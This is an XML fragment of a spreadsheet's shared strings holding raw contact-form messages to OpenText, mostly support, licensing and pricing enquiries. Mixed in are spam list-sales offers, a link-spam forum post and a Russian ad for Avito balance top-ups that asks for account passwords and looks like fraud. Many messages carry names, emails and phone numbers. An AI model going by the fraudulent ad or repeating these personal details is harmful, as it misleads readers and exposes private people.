    <t>We are interested for on-line training for Captiva (Captiva Fundamentals and Administration 7.6 3-8201, Captiva Designer 7.6 4-8206 and Captiva Developer 4-8207). They were scheduled for  19.2.2018, 26.2.2018 and 05.3.2018 and we were planning to register when couple of weeks ago. Now we can not find them. What happened? Can we register now? We are interested to pay for the training before the end of this year. Can we do something?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Greetings of the Day!_x000D_
_x000D_
I was reviewing your Company’s website and believe our Shared Services and Outsourcing Industry Leads would make a big impact on your email marketing and prospecting efforts.	_x000D_
_x000D_
Titles/Functions:_x000D_
_x000D_
•	Key Decision Makers_x000D_
•	Executives_x000D_
•	Managing Directors_x000D_
•	CEOs/COOs_x000D_
•	HR Heads/Purchase Heads _x000D_
•	Business Development Manager_x000D_
•	Operations Manager_x000D_
•	IT Vendor Manager_x000D_
•	Sales Manager_x000D_
•	Commercial Manager_x000D_
•	Professionals_x000D_
•	Services Practitioners_x000D_
•	Shared Services Centre’s_x000D_
•	IP &amp; Information Security Consultant _x000D_
•	Purchase Departments_x000D_
•	Administrative Departments_x000D_
•	Others Allied to this Field_x000D_
_x000D_
Segments:_x000D_
_x000D_
•	BPO centers_x000D_
•	IT/R&amp;D centers_x000D_
•	Business Expert Centre_x000D_
•	Digital Transformation_x000D_
•	Customer Service_x000D_
•	Outsourcing and off shoring and many more_x000D_
_x000D_
Please fill in your exact Target criteria in the below mentioned format, So that I can run counts and get back to you with samples and benefits for your review._x000D_
_x000D_
Target Job Title: _________ Target Industry: ______________   Target Geography: _____________ _x000D_
_x000D_
 We have complete contacts details and verified e-mail address across all industry._x000D_
_x000D_
Our list includes: Name, Job title, Company Name, Permission Based E-mail address, Contact number, Physical address and many more._x000D_
_x000D_
Guarantee: We guarantee up to 90% on our lists. If anything does not meet our guarantee agreement, we’d replace with fresh records and complete Ownership of list._x000D_
  _x000D_
Look forward to your response. Thank you so much for reading my email even in your busy schedule._x000D_
 _x000D_
Warm Regards,_x000D_
_x000D_
B2B/ E-mail Appending/Data Appending_x000D_
Business Development Coordinator_x000D_
4365-B Holcomb Bridge Road_x000D_
Roswell, GA 40325_x000D_
United States_x000D_
________________________________________                                             If you're not interested please reply subject line as "Leave Out"_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
My Support is not accessible for my account this is in spite of my company LeasePlan is one of your client. Need to know the process to get the access._x000D_
regards,_x000D_
sheo</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear sir_x000D_
_x000D_
_x000D_
I'm David from https://bestcallcenter.in/_x000D_
_x000D_
I came across your site and absolutely loved it!_x000D_
_x000D_
The thing is, I write on topics very similar to those covered in your_x000D_
blog and I already have a few ideas for a guest post in mind that I'm sure_x000D_
will be interesting for your readers._x000D_
_x000D_
I was wondering, do you accept guest posts? If you do, are there any_x000D_
guidelines for me to check out?_x000D_
_x000D_
I'll be happy to discuss any guest blogging opportunities with you!_x000D_
_x000D_
_x000D_
Looking forward to hearing from you,_x000D_
_x000D_
Best regards,_x000D_
David</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sourcing an EIM solution for my firm. Please contact me to discuss potential solutions. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi team , Can you please advice me  teamsite/livesite link to download the student/developer/trial version of teamsite/livesite product. i have worked in past and possibly will be working again very soon. Any help would be highly appreciable.  Many thanks Kind Regards raky </t>
  </si>
  <si>
    <t>We are moving a physical application server to a virtual environment. Currently using Faxware with a modem to transmit documents to customers. We are looking for a solution that can be utilized on a virtual server.</t>
  </si>
  <si>
    <t xml:space="preserve">I have version 16.2 32bit of ProVision installed on my machine and it's taking over 10 minutes to open.   Can I have a new install file for 64bit?  Will this resolve the issue?  Not sure why my co-workers opens in 10 seconds and mine has such a lag.  I've had our IT team look at it and they can't find a reason for this. </t>
  </si>
  <si>
    <t>Can you please e-mail me the link for the FREE Open Text Brava! Reader 15 day trial period? Our firewall is stopping the automated response, so I need someone in customer support to e-mail me the link directly. My Company is currently in the process of "certifying" the Open Text Brava! Desktop software for Company wide us, so we will be purchasing the permanent software soon. In the meantime, I need to use the FREE trial period version. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Teaming on a state government opportunity in California._x000D_
_x000D_
Please contact me at your earliest convenience._x000D_
</t>
  </si>
  <si>
    <t>We need to know if there is an administrator's account for HCA Eastside Medical Center in Snellville, GA and who is that contact.</t>
  </si>
  <si>
    <t>We are users of OpenText Exstream.  We have used the product since the old Dialogue Exstream days.  I have 11 developers on my team and we utilize the tool daily for a large utility in Houston.  I am interested in finding out who our account rep is as well as looking to collaborate with OpenText on how we can better utilize the software and other options you may have with regards to business transformation.  Can you have someone contact me either by phone or email?   Thank you, Keith Richardson</t>
  </si>
  <si>
    <t>We are a SharePoint Solutions company and a Microsoft Gold Partner, based on Pune, India. For one of our current opportunities, we feel OpenText Brava is best fit in the current solution with its capabilities. We wish to showcase its use from our demo server. This demo can be used in future as well for different customers._x000D_
_x000D_
Would request to kindly share a trial version to be put on our demo server for this purpose. It can very well show any watermarks etc. that differentiate it from a Production version if needed._x000D_
_x000D_
We can continue this dialogue on email in case any further details are needed.</t>
  </si>
  <si>
    <t>Inquiry on licensing costs for Teleform.  1. Licensing costs for a new setup at one of our project sites 2. Adding licences to an existing setup at another of our project sites</t>
  </si>
  <si>
    <t>Beste OpenText,_x000D_
_x000D_
Wij hebben momenteel een RigthFax appliance van jullie, echter willen we graag uitbreiden. Nu weten we niet of alle opties die we graag zouden willen hebben beschikbaar zijn. Is het mogelijk dat er iemand van jullie langskomt bij ons om hierover te overleggen?_x000D_
_x000D_
Alvast bedankt!_x000D_
_x000D_
Met vriendelijke groet,_x000D_
_x000D_
Stefan Hoogendoorn</t>
  </si>
  <si>
    <t>I'd find it useful to be able to view the RedDot Query Language Documentation listed in the manual - http://knowledge.opentext.com/knowledge/cs.dll/Open/17813709 (this is the hyperlink from the manual).</t>
  </si>
  <si>
    <t xml:space="preserve">HI,_x000D_
_x000D_
i need to know the licensing price information for our enterprise application._x000D_
We need cloud based solution._x000D_
Please advice._x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>I would like to know a price for your document management solution. Our specifications: on premises solution (server + 10 active clients) + set up needed. We are considering different solutions, so please reply ASAP._x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">looking to start a business with automotive parts and sell over seas_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">looking to start a business and sell over seas_x000D_
</t>
  </si>
  <si>
    <t>Good day! _x000D_
Can't go to the link: https://knowledge.opentext.com/knowledge/cs.dll/Open/41561891_x000D_
an access error occurs_x000D_
"No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
Please click on the link below to complete the process_x000D_
Request Confirmation Email "_x000D_
Email confirmed 3 times.</t>
  </si>
  <si>
    <t>はじめまして。広報人材育成・広報支援を行っている株式会社プラスカラーです。_x000D_
（http://pluscolor.co.jp）_x000D_
_x000D_
広報活動を通して、こんな事を実現させてみたくはありませんか？_x000D_
_x000D_
・新聞やテレビに出て会社の認知度をもっと高めたい_x000D_
・社内制度や社員を知ってもらうことで採用に繋げたい_x000D_
・社会的な問題に取り組む自分たちの活動を多くの人に知ってもらいたい_x000D_
_x000D_
↓↓↓↓↓一方、こんな悩みはありませんか？↓↓↓↓↓_x000D_
_x000D_
・広報をできる人がいない…_x000D_
・広報をやる時間もお金もない…_x000D_
・そもそも広報ってどうやるの？広告と違うの？_x000D_
_x000D_
弊社は今まで数多くの企業さまよりご相談をいただいておりますが、その多くが上記のような悩みです。_x000D_
実は、弊社のサービスをご利用頂いている企業さまの中で専任の広報担当を置かれている企業さまや、_x000D_
もともと広報機能のある企業さまは圧倒的に少数です。_x000D_
そのような状況の企業さまにおいても弊社のサービスをご利用いただくことで、_x000D_
メディアへの掲載を次々と実現されていらっしゃいます。_x000D_
_x000D_
弊社が提供している広報サービスのミニマムプランは月額7万円（税抜き）です。_x000D_
クライアントさまの大半がこちらをご利用されています。_x000D_
リソースも時間も知識も無い中、どのように成果を出しているのか？_x000D_
_x000D_
ご興味をお持ち頂けましたら、下記よりご希望のサービス紹介スタイルをご連絡下さい。_x000D_
弊社担当者より追ってご連絡させて頂きます。_x000D_
----------------------_x000D_
①直接御社へお伺いし、サービス説明を希望_x000D_
②電話にて、サービス説明を希望_x000D_
----------------------_x000D_
_x000D_
【月額7万円】で御社も広報をすぐにはじめられます！_x000D_
＜サービス内容＞_x000D_
★専属のアドバイザーが常時広報業務をサポート_x000D_
　プロの広報アドバイザーが専属で付き、オフラインでのお打合せやオンラインでの_x000D_
　相談をお受けします。_x000D_
★記者様と直接会える機会の提供_x000D_
　新聞、ネットメディア、雑誌等の記者様と直接お会い頂き、御社を直接ご紹介頂けます。_x000D_
　第三者視点の記事掲載を実現することで、広告とは異なる面から信頼向上を目指します。_x000D_
_x000D_
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝_x000D_
お問い合わせ：info@pluscolor.co.jp_x000D_
営業担当：小嶋 / 鈴木_x000D_
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝</t>
  </si>
  <si>
    <t>Привет всем участникам форума! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [url=http://kinovalenok.tv/]Лучшие детективы 2017 бесплатно[/url] _x000D_
http://kinovalenok.tv/drama/9623-kosmos-1999-space-1999-1975.html [b] Смотреть Космос: 1999 / Space: 1999 (1975) онлайн бесплатно [/b] _x000D_
[url=http://kinovalenok.tv/komediya/2615-sbezhavshaya-rabota-koll-centr-outsourced-cezon-1-2010.html] Смотреть Сбежавшая работа (Колл-центр) / Outsourced (Cезон 1) (2010) онлайн бесплатно [/url] _x000D_
http://kinovalenok.tv/otechestvennyy/6279-nenavizhu-i-lyublyu-2015.html _x000D_
Здесь: http://kinovalenok.tv/otechestvennyy/ [b] Онлайн лучшие отечественные фильмы [/b] _x000D_
Тут: [url=http://kinovalenok.tv/otechestvennyy/] Лучшие отечественные фильмы смотреть [/url] _x000D_
Здесь: [url=http://kinovalenok.tv/multfilmy/] 2017 в хорошем качестве hd лучшие мультфильмы [/url] 2017 в хорошем качестве hd лучшие мультфильмы</t>
  </si>
  <si>
    <t>Request for trial version</t>
  </si>
  <si>
    <t xml:space="preserve">i am interested in the a managed faxing solution.  </t>
  </si>
  <si>
    <t>We have VAN service through a 3rd party provider and wish to keep our current communication ID.</t>
  </si>
  <si>
    <t>We are looking for an outstanding product that will simplify our accounts payable process in combination with automatic upload of UUID/CFDI (Mexico Electronic Document)</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking around for new fax server software. </t>
  </si>
  <si>
    <t xml:space="preserve">I need help resetting the password for the catalog. I click on Reset Password and get this message: Password has been reset. New password will be emailed to users email address. I have not received yet. How long does it take? Who did it go to?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Michael Gutierrez_x000D_
Jeanne Pierre Originals_x000D_
mgutierrez@jeannepierre.com </t>
  </si>
  <si>
    <t>I need information related to using a multi function printer with rightfax. Could someone please call me between 7AM &amp; 3PM pacific time M-F except the holiday's. I have some what if questions. Thank you</t>
  </si>
  <si>
    <t>We are looking for an autoredaction solution for about 20-25 users, and I would like a price quote.  Also, I would possibly like to set up a demo.  Email is the best way to reach me.</t>
  </si>
  <si>
    <t xml:space="preserve">Naperville CUSD 203 is soliciting responses to a Request for Proposal on a Document Archival/Management system.  We are contacting you in hopes that you would respond to this request.  Please visit this site, https://www.naperville203.org/Page/3443, for the documentation that explains how to respond to this RFP.  Please feel free to contact me with any questions regarding the process to respond. </t>
  </si>
  <si>
    <t>Info about CCM solution and how to integrate it with our communications apps</t>
  </si>
  <si>
    <t>Hi. I want to request Vale to permit installation of the Brava Reader on company's computer. I have noticed however the OpenText intends to remove pdf from formats supported by BravaReader. Can you advise when this change will be effective, because without pdf that software would be useless for me here.</t>
  </si>
  <si>
    <t>Looking for a forms/signature/versioning solution for a client.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to direct clients to a recorded webinar from October for Exstream 16.3 - but the link is broken! Can someone help resolve this?_x000D_
</t>
  </si>
  <si>
    <t>Need to have the full installation and executable software for RightFax. In our RightFax server,  under the RightFax folder, when we double click Setup it says, Unable to locate the manifest file describing the installation files._x000D_
_x000D_
Checked the following locations:_x000D_
- C:\Program Files (x86)\RightFax\$Uninstall RightFax 10.6 Feature Pack 3 Service Release 3\Setup\manifest.xml_x000D_
- C:\Program Files (x86)\RightFax\$Uninstall RightFax 10.6 Feature Pack 3 Service Release 3\Setup\Disk1\manifest.xml_x000D_
_x000D_
This application cannot continue and must be closed.</t>
  </si>
  <si>
    <t xml:space="preserve">What is a batch type user and what is the access they have? _x000D_
_x000D_
I need to change contact information and reset password for user CS876C and I am not able to because the user is a batch type user. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I can set my new password._x000D_
Regards._x000D_
</t>
  </si>
  <si>
    <t>Not sure if you can help.... We are looking for essentially a Front End form system for creating credit card applications, sort of like a CMS, that can connect to our already in-place back end system that processes the applications.   Do you have a solution that might be able to help?  Thank you._x000D_
If you think so, kindly email me back, and I have a few more questions before we schedule a call.   Thanks!</t>
  </si>
  <si>
    <t>Requiero una demo de open text tengo un proyecto de knowledge management</t>
  </si>
  <si>
    <t>Gostaria de um orçamento para serviço de VAN para o Bradesco.</t>
  </si>
  <si>
    <t>Looking for support assistance in being able to sort ODBC phonebook by name, and how to populate ID.</t>
  </si>
  <si>
    <t>OpenText Order # 8000009978    PO Number: 1745133 . I received an email from OpenText on the PO # 1745133 with the information " Your order has been completed and is now ready for download from My Support" . After logging in, I am not able to see a tab for Products download on MY SUPPORT</t>
  </si>
  <si>
    <t>Hej!_x000D_
_x000D_
Jag har sett annonser där ni söker utvecklare, och tänkte därför kolla med er hur ni kompetenstestar era mjukvarukandidater idag. Vi på Future Skill tillhandahåller onlinetest där kandidatens kompetens mäts i olika kodtester och jag hade gärna kommit till er för att jämföra vårt verktyg med hur ni jobbar idag. _x000D_
Exempel på företag som använt våra tester i sin rekryteringsprocess inkluderar Ericsson, HiQ, Cybercom och Alten._x000D_
_x000D_
Jag sitter också i Göteborg, hade det varit intressant att sätta upp ett möte i januari där jag visar upp vår plattform?_x000D_
_x000D_
Ha en fortsatt fin onsdag!</t>
  </si>
  <si>
    <t>trying to reset my password and got error</t>
  </si>
  <si>
    <t xml:space="preserve">hello i try o make a silent install.cmd for Invoice Capture Center.msi_x000D_
msiexec /I "Invoice Capture Center.msi" INSTALLMODE=4 /l*v install.log /qb_x000D_
error_x000D_
MSI (s) (8C:A4) [11:58:00:905]: Doing action: ExitOnCONNECTIONSTRINGEmpty_x000D_
Action ended 11:58:00: InstallInitialize. Return value 1._x000D_
Action start 11:58:00: ExitOnCONNECTIONSTRINGEmpty._x000D_
MSI (s) (8C:A4) [11:58:05:523]: Product: Invoice Capture Center 7.5 -- Parameter CONNECTIONSTRING is missing._x000D_
have you a example for CONNECTIONSTRING ???????????_x000D_
regards_x000D_
</t>
  </si>
  <si>
    <t>yhehbw@contmy.info</t>
  </si>
  <si>
    <t>My name is Kim and I'm from PCM- En Pointe. We are a software reseller. May I request for a quote for EnCase® Forensic SMS 1 year for WSCA-NM HUMAN SERVICES DEPARTMENT. Customer is only looking for qty 1.</t>
  </si>
  <si>
    <t>I need to access support page</t>
  </si>
  <si>
    <t>SOLICITO UNA VISITA PARA VER LOS PRODUCTOS QUE TIENEN ASOCIADOS A UN GESTOR DOCUMENTAL</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I would like your help to access My Support / Partner Portal / Learning Central. My company SWEDWISE AB is an Open Text Partner with a valid partner contract. Our End User Code is EU0159717._x000D_
The problem for me to log in is a consequence for being wrongly registered as a customer instead of partner. </t>
  </si>
  <si>
    <t>Good afternoon_x000D_
_x000D_
For the last few years i have been using Brava Reader (Free version) to measure and scale PDF drawings. I have been unable to download this software again due to licencing agreements and have now learnt that the software will expire in Feb 2018. If i was to pay the $49 for the desktop version does this still allow me to measure and scale lengths, areas, perimeters etc or is there a completely different programme that you do? _x000D_
_x000D_
I have always found the Brava Reader software very helpful and user friendly so would be keen to continue to use this. What do you recommend?_x000D_
_x000D_
Many thanks_x000D_
_x000D_
Dan Jefferies</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 Interview : Einkauf 4.0 - ein aktueller Marktüberblick über eBusiness-Lösungen im Einkauf_x000D_
_x000D_
Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Rahmen meiner Bachelorarbeit führe ich eine Marktstudie zu oben genannten Thema durch. Gibt es hierzu einen Ansprechpartner für mich, welcher bereit wäre 15 Minuten mit mir zu sprechen?_x000D_
_x000D_
Über ein kurzes Feedback per E-Mail würde ich mich sehr freuen._x000D_
_x000D_
Vielen Dank vorab._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Phillip Kirsch_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mark, _x000D_
I’ve been sending a proposal regarding your recent project requirement on @Software  Developer in this email: mbarrenechea@opentext.com | please have a look… DM or mail: pabitra.m@andolasoft.co.in | Hoping a reply very soon! Good Day._x000D_
</t>
  </si>
  <si>
    <t>I tried to update my profile to have access to My support features. I've received confirmation e-amil and clicked "Confirm Registration" but still have information that I have no access to this site</t>
  </si>
  <si>
    <t>We would like to know the cost of a single licence for your OpenText Host Explorer product._x000D_
This is needed for a single SSL v3 connection to a third party Mainframe for a Macro 4 product install and evaluation._x000D_
_x000D_
Many thanks_x000D_
Tim Leader_x000D_
Macro 4 Ltd</t>
  </si>
  <si>
    <t>I am interested in your solution and I would like to have a demo.</t>
  </si>
  <si>
    <t>I have a question: we are thinking about buying OpenText Brava! DWG Viewer seat for 10 users. Is that a concurrent license in Citrix or named users?</t>
  </si>
  <si>
    <t>please call me for an interview</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi,_x000D_
_x000D_
Are you attending the Legalweek tradeshow in New York?  Invite the attendees to your booth through our attendees email list. Target lawyers by their practice areas/specialization, by geographical market, based on their age, and the number of years they have been practicing law._x000D_
_x000D_
Looking to target legal professionals or law firms ?_x000D_
_x000D_
National Lawyer Database contains over 1.02 Million lawyers and 650,000 email addresses. The database includes mailing address, law firm name, lawyer name, phone number, fax number, email address, company websites, legal area of specialization/practice, years of practice, age of lawyer, University attended, year of graduation, all in an excel fomat (.csv ) that can easily be imported into any sales or contact management software._x000D_
_x000D_
Our Lawyer database has key demographic information that will allow you to pinpoint your direct marketing efforts. This database is great for marketing products, services, seminars to the legal community._x000D_
_x000D_
We have compiled and managing the most exclusive and extensive database of attorneys and law firms in the United States._x000D_
_x000D_
Regards,_x000D_
            Donna Collins_x000D_
            New Account Executive_x000D_
            B2B Tech Data_x000D_
            San Clemente/ CA/USA_x000D_
 _x000D_
If you do not wish to receive any further email about our dental list, please reply with the subject line unsubscribe and we will remove you from our dental mailing list._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>we want to start the e-filling project and heart that you could provide this kind of service, can we have a short talk? thanks</t>
  </si>
  <si>
    <t>We are using Captaris Alchemy; and backup the database copy into the tape._x000D_
We want to retrieve the image (TIF, JPEG) from the tape; but, our Alchemy server is busy and we would like to know any mean / tools / other software to extract the image files from the database files?_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Hi, _x000D_
Am interest to inquire about the product  Teleform for a large project in the Philippines. Would like to know if you have a local presence here in the Philippines, contact person and contact number._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Looking for SEC 17a4 archive solution</t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to connect to the MySupport after registration.  I  cannot find the download links for RightFax software.  I have confirmed my email but still it says no access._x000D_
</t>
  </si>
  <si>
    <t>understand platform capability based on client's requirements</t>
  </si>
  <si>
    <t>Billing related - explanation on invoices for acct no. 853777.  I understand that Xpedite Systems, LLC is billing agency, can't find customer service numbers. Please call me at the number listed above 901 531.6650.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for updated faxclient for Windows 10. The version we have on disk is not compatible. </t>
  </si>
  <si>
    <t>Are there any virtual classes offered for course 3-2102 - Vendor Invoice Management (VIM) for SAP System Administration v7?</t>
  </si>
  <si>
    <t xml:space="preserve">[b]Пополение баланса Авито (Avito) за 50%[/b] | [b]Телеграмм @a556677[/b]  Старый Телеграмм @a1garant    НЕДЕЙСТВИТЕЛЕН _x000D_
 _x000D_
[b]Здравствуйте, дорогие друзья![/b] _x000D_
 _x000D_
Всегда рады предоставить Всем вам услуги по пополнению баланса на действующие активные аккаунты Avito (а также, совершенно новые). Если Вам надо  конкретные балансы - пишите, будем решать. Потратить можно  на турбо продажи, любые платные услуги Авито (Avito). _x000D_
 _x000D_
[b]Аккаунты не Брут. Живут долго.[/b] _x000D_
 _x000D_
Процент пополнения в нашу сторону и стоимость готовых аккаунтов: [b]50% от баланса на аккаунте.[/b] _x000D_
Если нужен залив на ваш аккаунт, в этом случае требуются логин и пароль Вашего акка для доступа к форме оплаты, пополнения баланса. _x000D_
Для постоянных заказчиков гибкая система бонусов и скидок! _x000D_
 _x000D_
[b]Гарантия: [/b] _x000D_
 _x000D_
[b]И, конечно же ничто не укрепляет доверие, как - Постоплата!!![/b] Вперед денег не просим... _x000D_
 _x000D_
Рады сотрудничеству! _x000D_
 _x000D_
[b]Заливы на балансы Авито[/b] _x000D_
________ _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Information on Documentum Capitol Projects Express or other Cloud based Document Management systems.</t>
  </si>
  <si>
    <t xml:space="preserve">My team is having trouble logging in to OpenText using BELK, BELK080, BELK0967 which we have all been using just fine since day one. Any suggestions? Thanks!! </t>
  </si>
  <si>
    <t>Need to validate additional licenses.</t>
  </si>
  <si>
    <t>issues with searching Rightfax phonebook  Search capabilities are too limited for our needs  Are there any alternate solutions?  We are considering moving to another vendor because of this</t>
  </si>
  <si>
    <t>Need to explore my knowledge in new field and new organisation.</t>
  </si>
  <si>
    <t>Your company is listed as a vendor of FiberNet which is a company that Crown Castle has recently acquired. We would need updated information regarding points of contact and email addresses, if you wish to do potential business with them in the future. If you do not wish to do possible business with them in the future please let us know.</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Good day,_x000D_
_x000D_
We are writing to you today on behalf of Mintz Global Screening, we are a company that specializes in background screening and verifications. We are currently completing an employment verification for one of our clients and your company name was provided to us by an applicant as a previous or current employer. _x000D_
_x000D_
Please advise of your process for this or direct us to the best person to contact to complete this request._x000D_
File : EM20173490656_x000D_
_x000D_
Thank you in advance for your kind cooperation and we wish you a good day. _x000D_
_x000D_
Best regards,  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 	  Hicham El Ghamri_x000D_
  Agent de vérification | Screening Agent_x000D_
  1303 rue William, bureau 200| Montréal, QC | H3C 1R4_x000D_
  helghamri@mintzglobal.com _x000D_
  T +1 514 587 6200 x 2086 | 1 877 359 8130 | F 1 866 390 4935 | _x000D_
New York | Washington, D.C. | San Francisco | Miami | Chicago  Dallas Mumbai | Singapore_x000D_
London | Beijing | Hong Kong | Montréal | Toronto | Nairobi | São Paulo_x000D_
_x000D_
This communication may be protected by the attorney/client privilege and may contain confidential information intended only for that person to whom it is addressed. If it has been sent to you in error, please do not read it. Please reply to the sender by e-mail or the phone number immediately above that you have received the message in error. Then delete this message and any attachments without copying, forwarding or reading it. Any dissemination, distribution, copying, forwarding or other reproduction of this message is strictly prohibited. _x000D_
Cette communication pourrait être protégée par le secret professionnel et elle contient des renseignements confidentiels destinés uniquement à la personne à qui ce message a été adressé. Si ce message vous a été envoyé par erreur, veuillez ne pas le lire. Veuillez répondre à l’expéditeur par téléphone ou par courriel immédiatement pour lui signaler l’erreur, puis supprimez ce message et toutes ses pièces jointes sans les reproduire, les transférer ou en prendre connaissance. Toute propagation</t>
  </si>
  <si>
    <t>Trying to obtain software download, account creation errors.</t>
  </si>
  <si>
    <t xml:space="preserve">Currently using an OpenText RightFax Express in our San Diego office.  Need 2 more 4-line RightFax Express appliances. </t>
  </si>
  <si>
    <t xml:space="preserve">solicito cotação para EDI financeiro </t>
  </si>
  <si>
    <t xml:space="preserve">Requested My Support access a while ago. no response yet. Please grant access or let me know if you have questions. </t>
  </si>
  <si>
    <t>Document management system for industrial Projects.</t>
  </si>
  <si>
    <t>Renewal for State of Missouri</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to get my account upgraded so I can access support resources. I have confirmed my email but when I click on "Upgrade Account' it takes me on a loop to login again. _x000D_
_x000D_
Please assist. </t>
  </si>
  <si>
    <t>We are in the exploration stage of looking at a new CCM product to replace our Istream Document Manager (Calligo) product which is no longer supported by Oracle.  We have been in touch with DocVentive who you are partners with, but wanted to reach out to see what your product offers in terms of on-premise and cloud based software to migrate all of our client output to a single solution.  The majority of our output is produced either by Istream (Calligo) and another product called Formscape which is no longer supported (currently called BottomLine Technologies).  Please contact me my email.  Thank you</t>
  </si>
  <si>
    <t>Hi, I used to have the software download link enabled in the EMC Support Site. After it got migrated to the OpenText Support, I couldn't access the download site. Can you please help?</t>
  </si>
  <si>
    <t>I received this email last week the error message is vague enough that I can't remedy the issue myself:_x000D_
&gt;&gt;&gt;R-9-2661743-1699615578-2-1-US2-EB20776C@xmr11.com_x000D_
Dec 12 (7 days ago)_x000D_
_x000D_
to me _x000D_
User number 2661743, an error was encountered by the system processing your request._x000D_
The system is unable to parse enough information to generate_x000D_
your normal cancel report. This message was not delivered. If you want this_x000D_
message to be delivered, please correct the error and enter it again._x000D_
_x000D_
The cause of the error was:_x000D_
_x000D_
file "Untitled_20171212_110328.PDF" not found_x000D_
file "Untitled_20171212_110328.PDF" is empty_x000D_
_x000D_
_x000D_
For assistance, please contact EasyLink Customer Support: _x000D_
_x000D_
http://www.easylink.com/support</t>
  </si>
  <si>
    <t>I am looking for some pricing information for Rightfax.</t>
  </si>
  <si>
    <t>Hello!  I need to update the email address that faxes are sent to.  Faxes are currently being sent to Cheryl.Taylor@Aimia.com.  Our company has been sold and our email address is now Cheryl.Taylor@One10Marketing.com.  How do I update this?  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a Transactional content server suite and am interested in OpenText Content Suite.  I run a business process that involves receiving approx 2 million free-form documents a year via mail, fax, email, FTP and field scanning.  We have a large team that scans (where necessary), cleans and merges/separates these documents as pdf, and then indexes them against a database before going through a pass/fail QA approval process. We try to retain as much metadata around each file as possible (received date, source, processor name, client, etc).  The tool needs to be able to manage multiple processing queues, access rights to files based on metadata field, and imaging / approval functions must be workable remotely via the web as our team is globally distributed._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>we purchase one software called teamcenter ,now we need your company business license, but no one response me</t>
  </si>
  <si>
    <t>Innovation Tour 2018 München_x000D_
_x000D_
Sehr geehrte Damen und Herren,_x000D_
_x000D_
wie hoch sind die Kosten für die Teilnahme?_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Herbert Schwarzer</t>
  </si>
  <si>
    <t>Looking at your Rightfax cloud solution and like to discuss opportunity to do business in EMEA</t>
  </si>
  <si>
    <t xml:space="preserve">Enquire about Right fax solution n pricing </t>
  </si>
  <si>
    <t>Not able to access support even after verifying email multiple times.</t>
  </si>
  <si>
    <t>Looking for contact with alliance team that handles Big 4 relationships</t>
  </si>
  <si>
    <t>I want to buy brava enterprise license, please response me soon,thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I'm contacting You behalf of our client. We got new request for StreamServe consultant and I wonder if You could help me? If you have any resources available, please give me a call/email or feel free to submit an online application through this link:_x000D_
https://www.eworkgroup.com/assignment/eworkid/100283631 </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam,_x000D_
_x000D_
This Request For Information (RFI) has been issued for a package selection for an Enterprise Architecture environment for Sogeti, business line Information Management (IM) With Sogeti IM, a need has recently arisen for establishing value chain and information flow structures. If you wish to participate, please send a reply to my e-mail_x000D_
_x000D_
With kind regards,_x000D_
_x000D_
Danny Smit_x000D_
</t>
  </si>
  <si>
    <t>I want to join this organization. Just want to know whether there are any opportunities for me.</t>
  </si>
  <si>
    <t>Vi har idag Exceed för Win 7 men behöver uppgradera för Win 10</t>
  </si>
  <si>
    <t>We are looking for an Italian reseller of OpenText Gupta SQLBase._x000D_
Thank you. Francesco</t>
  </si>
  <si>
    <t>Hi ,_x000D_
   I am sr. consultant and I have requirement of VAN connectivity for one  customer. He is having 2 partners to files exchange with them. He is going to exchange 3000 - 4000 files per year. He mainly deals with Orders ,orders response and invoice data. May I know VAN chagrges and please send me the best quote for this. It is urgent requirement</t>
  </si>
  <si>
    <t>I would like to know how I can purchase a manual for a Hummingbird 788 CI HD DI  The Serial  # is 120312030104   I have purchase a used boat that has one of these on it and I don't know how to use it. I would appreciate any help you can offer. Thank you, George Ellis</t>
  </si>
  <si>
    <t>Unable to reset psswd.  Have not received an email with instructions on how to reset._x000D_
Please assist.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I'm wondering what are the requirements to obtain an Athens Greece number. I do not have a location there, but I want to make it look like we have a local office in Athens Greece._x000D_
_x000D_
Is there any type of proof of address required to obtain a number? </t>
  </si>
  <si>
    <t>My company is current looking at document management systems for one of our an Oil and Gas Client who is growing quite rapidly, to help manage their assets in an effective and efficient streamlined manner. We know there are various Opentext systems, we would like to know more about Livelink and Documentum and any other system that may fit our needs.</t>
  </si>
  <si>
